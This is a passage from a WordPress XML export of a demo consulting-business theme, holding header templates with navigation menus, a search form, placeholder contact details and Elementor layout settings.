;s:16:"text_hover_color";i:1;s:26:"menu_typography_typography";i:1;s:25:"menu_typography_font_size";i:1;s:27:"menu_typography_font_weight";i:1;}s:19:"style_smenu_section";a:1:{s:27:"smenu_typography_typography";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_form_section";a:1:{s:6:"bg_btn";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"button_section";a:2:{s:4:"text";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:1:{s:6:"btn_bg";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header Mobile - Logo Center</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/ot_header_builders/header-mobile-logo-center/</link>
		<pubDate>Sat, 23 May 2020 11:00:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=168</guid>
		<description></description>
		<content:encoded><![CDATA[<button></button>
						<a href="#"></a>
							<ul id="menu-main-menu"><li id="menu-item-1291"><a href="http://wpdemo.archiwp.com/maxbizz-consulting">Home</a></li>
<li id="menu-item-1292"><a href="#">Pages</a>
<ul>
	<li id="menu-item-1320"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/about-us/">About Us</a></li>
	<li id="menu-item-1342"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/">Our Services 1</a></li>
	<li id="menu-item-1337"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-1326"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-1327"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-team/">Our Team</a></li>
	<li id="menu-item-1328"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-1324"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/elements/">Elements</a></li>
	<li id="menu-item-1329"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/typography/">Typography</a></li>
	<li id="menu-item-1325"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/faqs/">FAQs</a></li>
	<li id="menu-item-1321"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/404-2/">404</a></li>
	<li id="menu-item-1322"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1340"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1343"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1341"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1339"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1346"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1338"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/">Services</a>
<ul>
	<li id="menu-item-1336"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1335"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1334"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1333"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1332"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1331"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-1330"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/blog/">Blog</a>
<ul>
	<li id="menu-item-1344"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/blog/">Blog List</a></li>
	<li id="menu-item-1345"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/2020/02/24/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-1323"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/contacts/">Contacts</a></li>
</ul>						   	
				<a href="http://wpdemo.archiwp.com/maxbizz-consulting/">
					<img src="https://maxbizz.s3.amazonaws.com/images/02_Black.svg" alt="Maxbizz Consulting">
				</a>			        
				<!-- Form Search on Header -->
						<form role="search" method="get" action="http://wpdemo.archiwp.com/maxbizz-consulting/" >
    <label>Search for:
    <input type="search" placeholder="Search&hellip;" value="" name="s" /></label>
	<button type="submit"></button>
    </form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>168</wp:post_id>
		<wp:post_date><![CDATA[2020-05-23 11:00:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-05-23 11:00:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-mobile-logo-center]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"d17082b","elType":"section","settings":{"structure":"30","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"}},"elements":[{"id":"cd86fb1","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_mobile":30,"_ot_content_align":"horizontal"},"elements":[{"id":"82c9ed8","elType":"widget","settings":{"nav_menu":"main-menu","icon_color":"#000000","pos_menu":"on-left"},"elements":[],"widgetType":"imenu_mobile"}],"isInner":false},{"id":"331e8c4","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_mobile":40},"elements":[{"id":"9b03ba7","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02_Black.svg","id":350},"_padding":{"unit":"px","top":"22","right":"0","bottom":"22","left":"0","isLinked":false},"align":"center","logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"1f2ae1c","elType":"column","settings":{"_column_size":33,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal","_inline_size_mobile":30},"elements":[{"id":"5b15a8e","elType":"widget","settings":{"icon_color":"#000000","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false}},"elements":[],"widgetType":"isearch"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-07-23]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:12:"imenu_mobile";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}s:7:"content";a:1:{s:15:"content_section";a:1:{s:8:"pos_menu";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:4:{s:12:"_inline_size";i:3;s:19:"_inline_size_mobile";i:3;s:17:"_ot_content_align";i:2;s:5:"align";i:1;}}}}s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:10:"logo_image";i:1;s:5:"align";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:1;s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:1:{s:17:"section_structure";a:1:{s:9:"structure";i:1;}}s:5:"style";a:1:{s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/ot_header_builders/header-3/</link>
		<pubDate>Fri, 24 Jul 2020 03:48:42 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=182</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz/">
					<img src="https://maxbizz.s3.amazonaws.com/images/03_White.svg" alt="Maxbizz">
				</a>			        
				<a href="tel:+1-800-456-478-23">
				

	
		
	

				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				

	
		
	

				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
								
				<h6>
					Our Working Hours
				</h6>
								<p>Mon - Sat: 8.00 - 18.00</p>
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-361"><a href="http://wpdemo.archiwp.com/maxbizz/">Home</a></li>
<li id="menu-item-363"><a href="#">Pages</a>
<ul>
	<li id="menu-item-368"><a href="#">About Us</a></li>
</ul>
</li>
<li id="menu-item-364"><a href="#">Portfolio</a></li>
<li id="menu-item-365"><a href="#">Blog</a></li>
<li id="menu-item-366"><a href="#">Shop</a></li>
<li id="menu-item-367"><a href="#">Contacts</a></li>
</ul>			</nav>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Instagram
											</a>
				<!-- Form Search on Header -->
						
    <label>Search for:
    </label>
	<button type="submit"></button>
    ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>182</wp:post_id>
		<wp:post_date><![CDATA[2020-07-24 03:48:42]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-24 03:48:42]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-3]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.4]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"15f82ce","elType":"section","settings":{"content_position":"middle","structure":"20","padding":{"unit":"px","top":"22","right":"0","bottom":"43","left":"0","isLinked":false},"background_background":"classic","background_color":"#282828","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"}},"elements":[{"id":"d78080f","elType":"column","settings":{"_column_size":50,"_inline_size":20},"elements":[{"id":"2b1b8bd","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03_White.svg","id":377},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"d4b56e5","elType":"column","settings":{"_column_size":50,"_inline_size":80,"_ot_content_align":"horizontal","align":"flex-end"},"elements":[{"id":"cd56b26","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#A5A5A5","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"0","isLinked":false},"link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"3c30484","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":24,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#A5A5A5","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"74c4536","elType":"widget","settings":{"title_text":"Our Working Hours","description_text":"Mon - Sat: 8.00 - 18.00","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/symbol.svg","id":356},"library":"svg"},"title_color":"#A5A5A5","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false}},"elements":[],"widgetType":"icon-box"}],"isInner":false}],"isInner":false},{"id":"3346a7f","elType":"section","settings":{"content_width":{"unit":"px","size":1280,"sizes":[]},"background_background":"classic","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"margin":{"unit":"px","top":"-33","right":0,"bottom":"0","left":0,"isLinked":false}},"elements":[{"id":"7fae78a","elType":"column","settings":{"_column_size":100,"_inline_size":null,"content_position":"center","align":"flex-end","_ot_column_min_width":{"unit":"px","size":220,"sizes":[]},"_ot_content_align":"horizontal"},"elements":[{"id":"4d3a690","elType":"section","settings":{"layout":"full_width","structure":"20","background_background":"classic","background_color":"#FFFFFF","border_radius":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"padding":{"unit":"px","top":"0","right":"40","bottom":"0","left":"40","isLinked":false}},"elements":[{"id":"911d327","elType":"column","settings":{"_column_size":50,"_inline_size":74.957999999999998408384271897375583648681640625,"_ot_content_align":"horizontal"},"elements":[{"id":"82c5870","elType":"widget","settings":{"nav_menu":"main-menu","text_hover_color":"#D92300","menu_typography_typography":"custom","menu_typography_font_family":"Raleway","menu_typography_font_weight":"700"},"elements":[],"widgetType":"imenu"}],"isInner":true},{"id":"e0ea046","elType":"column","settings":{"_column_size":50,"_inline_size":25.042000000000001591615728102624416351318359375,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"9e80548","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"#02010100","__globals__":{"item_icon_primary_color":""}},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-instagram","library":"fa-brands"},"link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)","_id":"e7140d6"}],"shape":"circle","align":"","icon_size":{"unit":"px","size":12,"sizes":[]},"icon_padding":{"unit":"em","size":0.5,"sizes":[]},"icon_spacing":{"unit":"px","size":8,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"#C9C9C9","_padding":{"unit":"px","top":"22","right":"0","bottom":"22","left":"0","isLinked":false},"icon_color":"custom","hover_primary_color":"#D92300","hover_border_color":"#D92300","icon_secondary_color":"#373737","hover_secondary_color":"#FFFFFF"},"elements":[],"widgetType":"social-icons"},{"id":"60be152","elType":"widget","settings":{"bg_btn":"#D92300","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false}},"elements":[],"widgetType":"isearch"},{"id":"3b1d036","elType":"widget","settings":{"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"20","isLinked":false}},"elements":[],"widgetType":"isidepanel"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:5;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:5:{s:12:"_inline_size";i:5;s:17:"_ot_content_align";i:4;s:5:"align";i:3;s:16:"content_position";i:1;s:20:"_ot_column_min_width";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:1;}}s:5:"style";a:2:{s:18:"section_style_icon";a:3:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;}s:21:"section_style_content";a:12:{s:26:"content_vertical_alignment";i:3;s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:3;}}}}s:7:"section";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:16:"content_position";i:1;s:6:"layout";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:2;s:6:"margin";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:3;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:26:"box_shadow_box_shadow_type";i:2;s:21:"box_shadow_box_shadow";i:3;s:13:"border_radius";i:1;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:5:"style";a:1:{s:18:"style_menu_section";a:4:{s:16:"text_hover_color";i:1;s:26:"menu_typography_typography";i:1;s:27:"menu_typography_font_family";i:1;s:27:"menu_typography_font_weight";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:7;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:8:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;s:20:"icon_secondary_color";i:1;}s:20:"section_social_hover";a:3:{s:19:"hover_primary_color";i:1;s:18:"hover_border_color";i:1;s:21:"hover_secondary_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_form_section";a:1:{s:6:"bg_btn";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:10:"isidepanel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/ot_header_builders/header-4/</link>
		<pubDate>Fri, 24 Jul 2020 06:55:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=217</guid>
		<description></description>
		<content:encoded><![CDATA[<ul>
							<li>
													
										  Mon - Sat: 8.00 - 18.00
									</li>
								<li>
							

	
		
	

						
										411 University St, Seattle
									</li>
								<li>
					<a href="tel:+1-800-456-478-23">						
							

	
		
	

						
										+1-800-456-478-23
											</a>
									</li>
						</ul>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Instagram
											</a>
			<a href="#" role="button">
						FREE QUOTE
					</a>
				<a href="http://wpdemo.archiwp.com/maxbizz/">
					<img src="https://maxbizz.s3.amazonaws.com/images/04_Black.svg" alt="Maxbizz">
				</a>			        
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-361"><a href="http://wpdemo.archiwp.com/maxbizz/">Home</a></li>
<li id="menu-item-363"><a href="#">Pages</a>
<ul>
	<li id="menu-item-368"><a href="#">About Us</a></li>
</ul>
</li>
<li id="menu-item-364"><a href="#">Portfolio</a></li>
<li id="menu-item-365"><a href="#">Blog</a></li>
<li id="menu-item-366"><a href="#">Shop</a></li>
<li id="menu-item-367"><a href="#">Contacts</a></li>
</ul>			</nav>
				<!-- Form Search on Header -->
						
    <label>Search for:
    </label>
	<button type="submit"></button>
    ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>217</wp:post_id>
		<wp:post_date><![CDATA[2020-07-24 06:55:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-24 06:55:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-4]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.4]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
